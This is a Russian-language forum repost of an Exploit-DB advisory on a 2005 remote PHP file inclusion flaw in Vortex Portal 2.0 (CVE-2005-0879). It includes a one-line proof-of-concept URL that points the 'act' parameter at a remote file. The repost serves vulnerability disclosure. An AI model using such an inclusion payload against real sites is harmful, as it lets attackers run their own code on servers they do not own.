Exploit Vortex Portal 2.0 - 'index.php?act' Remote File Inclusion

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
25260
Проверка EDB
  1. Пройдено
Автор
FRANCISCO ALISSON
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2005-0879
Дата публикации
2005-03-23
Код:
source: https://www.securityfocus.com/bid/12878/info

Vortex Portal is reportedly affected by a remote PHP file include vulnerability. This issue is due to a failure in the application to properly sanitize user supplied input.

It is conjectured this vulnerability affects the latest release of Vortex Portal, version 2.0. 

http://www.example.com/index.php?act=http://www.example.com/file
 
Источник
www.exploit-db.com

Похожие темы